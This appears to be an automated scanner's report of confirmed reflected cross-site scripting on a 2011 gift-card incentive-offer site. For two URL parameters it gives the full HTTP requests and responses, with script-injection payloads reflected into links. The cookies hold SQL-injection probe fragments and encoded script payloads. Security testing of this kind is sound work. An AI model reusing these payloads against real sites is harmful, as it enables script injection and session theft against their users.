x_win=window.open('/ups.htm?path=p.prize.prepop-reg&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence='"--></style></script><script>netsparker(0x0001D0)</script>&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

// -->
</SCRIPT>
</HEAD>
<BODY onUnLoad="x_win();" bgcolor="#FFFFFF" text="#000000">
<table width="100%" border=0 cellspacing=0 cellpadding=0 align="center">

<tr>
<td align=center colspan=2><img border=0 src="http://i.pcp001.com/t/6846/statusbar3_silver.gif"> </td>
</tr>


</table>
<table width="700" border="1" cellspacing="0" cellpadding="0" bordercolor="#FFCC00" align="center">
<tr>
<td><table width="700" border="0" cellspacing="0" cellpadding="0" align="center">
<tr>
<td valign=top>

<table width="100%" border=0 cellspacing=0 cellpadding=0>
<tr>
<td colspan=2><table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">
<tr>
<TD><P> <font face="Arial, Helvetica, sans-serif"> <FONT size="5" color="#000000"><B> $250 in McDonald's&reg; Arch Cards&trade; - Reserved for</B></FONT>: <BR>
<FONT COLOR=#FF0000 SIZE=-1>dork@webprizeland.com
</FONT> </TD>
<TD ALIGN=center> <img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""> </TD>
</TR>
<TR>
<TD COLSPAN=2><font face="Arial, Helvetica, sans-serif" size=2><B>Congratulations!</B> To qualify for your FREE $250 in McDonald's&reg; Arch Cards&trade; start by fully completing any <U><B>2</B></U> of the sponsor offers listed below on this page! It's fast and easy!<P><B>How can we offer this $250 in McDonald's&reg; Arch Cards&trade; for free?</B> - Our sponsors cover the costs of the $250 in McDonald's&reg; Arch Cards&trade; along with the shipping and handling charges. To claim your $250 in McDonald's&reg; Arch Cards&trade; simply complete the offers as instructed. Once you fulfill the participation requirements, we will ship the incentive gift to you with free shipping.<P>Prior to us shipping the $250 in McDonald's&reg; Arch Cards&trade;, you will have the opportunity to re-confirm your shipping address to ensure speedy delivery.</FONT></TD>
</TR>
</TABLE></TD>
</TR>
</TABLE>
<CENTER><FONT COLOR=#FF0000 FACE="Verdana,sans-serif" SIZE=4><B>TOP OFFERS PAGE 1 of 3 - Silver Offers</B></FONT><P><FONT COLOR=#000000 FACE="Verdana,sans-serif" SIZE=3><B>Begin by completing any 2 Silver offers below</B>!</FONT></CENTER><table width="95%" border="0" cellspacing="0" cellpadding="5" align="center"></table> </TD>
</TR>
<TR>
<TD COLSPAN=4>&nbsp;</TD>
</TR>
</TABLE>
<BR>
<BR>
<CENTER><TABLE WIDTH=640><TR><TD ALIGN=center><FONT FACE=verdana,sans-serif SIZE=+1><B><A HREF="/ups.htm?path=p.prize.prepop-reg-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001D0)</script>&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;">After You've Completed 2 Silver Offers above, Go To Next Page</FONT></A></B></TD></TR></TABLE></CENTER> <BR>
<BR></TD>
</TR>
</TABLE>
<BR>
<BR>
<BR>
<CENTER>
<TABLE WIDTH=720 BORDER=0>
<TR>
<TD><FONT FACE="verdana,sans-serif" SIZE=1 COLOR=#666666>

<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<!--BeginField:Disclaimer-->You must complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and satisfy all <A HREF="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</A> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <A HREF="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<p></p>
To complete credit card offers you must activate your card by making a purchase, transferring a balance, or making cash advance; you must have the product installed for satellite tv offers.
<p></p>
Your-gift-zone�s Gift Program is not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.<!--EndField:Disclaimer-->

<p align="center">
<!--BeginField:Links-->
<A HREF="redeem.htm?promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('redeem.htm?promo_name=2192name&gift=29617&catalog_id=13200','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Check Gift Status</A> - <A HREF="info.htm?tp=faq&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('info.htm?tp=faq&promo_name=2192name&gift=29617&catalog_id=13200','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;"> Help</A> - <A HREF="info.htm?tp=privacy&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('info.htm?tp=privacy&promo_name=2192name&gift=29617&catalog_id=13200','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="suppress.htm?user_ref_id=90563525&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('suppress.htm?user_ref_id=90563525&promo_name=2192name&gift=29617&catalog_id=13200','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/cs/?promo_name=&gift=&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/cs/?promo_name=&gift=&catalog_id=13200','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A>
<!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2010 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->
</CENTER></TD>
</TR>
</TABLE>
</BODY>
</HTML>
- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_..

Parameters

Parameter Type Value
path GET p.prize.prepop-reg
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET 13200
ups_ref GET cg
remoteRef GET 3_4_0_5068_0
sendroikwd GET 3
return_url GET 3
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_list GET '"--></style></script><script>alert(0x0001D1)</script>
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265

Request

GET /ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D1)%3C/script%3E&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265 HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: CHAR(109)=; CHAR(97))=; 0x3a=; CHAR(97)))=; TlM3NzU0NTYxNDQ2NTc1=; 2))--=; 1=; 1))=; 0)>255)=; 0)=1; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTM2KTwvc2NyaXB0Pg==; 0)>0--=; 0)<255--=; 0)>255--=; 0)>25--=; 0)>0=; 0)<255=; 0)>255=; 0)>25=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMUFGKTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 15:06:26 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db830f2cabf0enz;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_user_pin_id=200492244;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_pin_key=706853;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_email_key=063756462f49f8c46ec5bc4e60bb02b1;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001D1)</script>&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001D1)</script>&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_..

Parameters

Parameter Type Value
path GET p.prize.prepop-reg
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET 13200
ups_ref GET cg
remoteRef GET 3_4_0_5068_0
sendroikwd GET 3
return_url GET 3
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_list GET li_sr_sm
short_ic_path GET '"--></style></script><script>alert(0x0001D2)</script>
SID GET f05c7ce946bc38d8bfa6b839a4d56265

Request

GET /ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E&SID=f05c7ce946bc38d8bfa6b839a4d56265 HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: CHAR(109)=; CHAR(97))=; 0x3a=; CHAR(97)))=; TlM3NzU0NTYxNDQ2NTc1=; 2))--=; 1=; 1))=; 0)>255)=; 0)=1; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTM2KTwvc2NyaXB0Pg==; 0)>0--=; 0)<255--=; 0)>255--=; 0)>25--=; 0)>0=; 0)<255=; 0)>255=; 0)>25=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMUFGKTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 15:06:29 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db830f545f84fbu;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_user_pin_id=200492244;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_pin_key=706853;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_email_key=063756462f49f8c46ec5bc4e60bb02b1;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001D2)</script>" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001D2)</script>" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
